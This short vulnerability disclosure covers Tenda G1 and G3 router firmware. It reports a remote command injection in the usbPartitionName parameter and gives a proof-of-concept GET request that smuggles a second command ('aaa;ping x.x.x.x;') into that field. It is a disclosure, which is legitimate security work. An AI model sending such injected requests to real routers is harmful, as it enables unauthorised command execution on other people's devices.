# tenda2 vendor:Tenda product:G1,G3 version:V15.11.0.17(9502)\_CN(G1), V15.11.0.17(9502)\_CN(G3) type:Remote Command Execution author:Jinwen Zhou、Yifeng Li; institution:potatso@scnu、feng@scnu ## Vulnerability description We found an Command Injection vulnerability and buffer overflow vulnerability in Tenda Technology Tenda's **G1 and G3** routers with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted GET request. ### Remote Command Injection vulnerability In **formSetUSBPartitionUmount** function, the parameter **"usbPartitionName"** is not filter the string delivered by the user, so we can control the **usbPartitionName** such as **"aaa;ping x.x.x.x;"** to attack the OS.  ## PoC ### Remote Command Injection We set the value of **usbPartitionName** as **aaa;ping x.x.x.x;** and the router will excute **ping** command. ```example.com/action/umountUSBPartition?usbPartitionName=aaa;ping x.x.x.x;```